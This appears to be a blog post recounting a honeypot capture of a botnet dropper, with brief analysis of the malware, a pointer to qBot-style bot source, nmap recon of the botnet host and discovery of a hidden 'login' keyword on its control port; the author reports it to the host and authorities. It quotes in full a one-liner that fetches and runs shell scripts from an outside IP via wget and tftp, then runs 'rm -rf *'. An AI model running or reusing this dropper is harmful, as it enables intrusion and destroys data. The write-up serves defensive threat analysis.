Hacking the Hackers: Taking Down a Live Botnet
It was a Wednesday afternoon when I decided to check the honeypot logs on my VPS. Oh no, a botnet has tried to infect the server! Let’s investigate, and get them back for all the servers they are infecting!
The payload can look a bit confusing, so let’s analyze it first.
“cd /tmp || cd /run || cd /; wget http://142.11.216.5/xxxbins.sh; chmod 777 xxxbins.sh; sh xxxbins.sh; tftp 142.11.216.5 -c get xxxtftp1.sh; chmod 777 xxxtftp1.sh; sh xxxtftp1.sh; tftp -r xxxtftp2.sh -g 142.11.216.5; chmod 777 xxxtftp2.sh; sh xxxtftp2.sh; rm -rf xxxbins.sh xxxtftp1.sh xxxtftp2.sh; rm -rf *”
First, it puts a malicious bash script into either /tmp, /run, or / to avoid malware being easily found. Then, it grabs more files from an FTP server with anonymous login enabled, sets their permissions, and runs them. Finally, it clears its tracks by running “rm—rf *.”
The bash script gets more files from the botnet’s web server, sets execute permissions, runs them and removes them. This tells us that the file they are running is creating another file/process to keep itself running because if it wasn’t, the ‘rm -rf’ command would remove the infection.
Brief Malware Analysis |
I’m not going to go too far on this topic since I want to highlight the scanning of the actual host, but I will go over this quickly.
The file contained many user agents, which most likely means that the botnet is involved in Layer 7 attacks. The bot would need to know which user agents to switch between when flooding a website.
This is quite common in botnets. The group that made this botnet left its mark in the binary for people who try to steal its source code just to show off/obtain credit for its work.
This one is interesting. I am guessing that it would be used for a type of DDoS method that bypasses CAPTCHAs shown by services like Cloudflare.
These are the attack vectors on the botnet; the last word was blurred for obvious reasons.
Brief Malware Analysis | 23
Here are some of the main details I obtained from the ‘23’ file.
This is really interesting because, as you can see, the files are ‘/dev/null’, which is basically the empty void on Linux. This might be a misconfiguration or a bad actor who obtained the botnet from someone else, forgot to change the needed values, deployed it, and realized his mistake. This is pretty common in botnet findings. Some payloads even include requests to local IPs!
Here is some encoded text that I decided to search on Google, and I found the source code for the binary!
https://raw.githubusercontent.com/USBBios/Mortem-qBot-Botnet-Src/main/bot.c
It turns out the random strings are being used to send hex strings in an attack, which is used to evade firewalls or “bypass” attack vectors.
I was right; the file must keep running on the system, receiving commands directly from the botnet.
Host Recon
Now, onto the fun part: host recon! We can start with a Nmap scan on ports 1–65535:
We see the anonymous FTP being reached for binaries, the SSH port and the webserver.
These ports interest me, especially 420. Sometimes, bad actors can be very immature and pick ports like 420, 69, 42069, etc.
Connecting
Port 111 dropped the connection right away.
I started typing random characters into the connection in hopes of finding something, and I got something.
I noticed that when I was typing things and pressing enter, it erased it each time I did that. I got an idea that maybe this was being used as an evasion method to make people think that there were no services on the port, which would mean that there was some keyword that the Botnet Master knew to connect. I tried words like “attack”, “password”, “open” and “ddos”. But then, I tried “login”:
Boom.
The End
Hacking back is unethical and illegal. Instead of actually “hacking” the botnet (contrary to the title), I took all of these findings and reported them to the hosting provider that was hosting this and the authorities, and they promptly took the botnet offline and all of the malware hosted in the FTP server. I also forwarded any IOCs from the malware to a few malware analyst friends and added them to VirusTotal to aid future decisions.
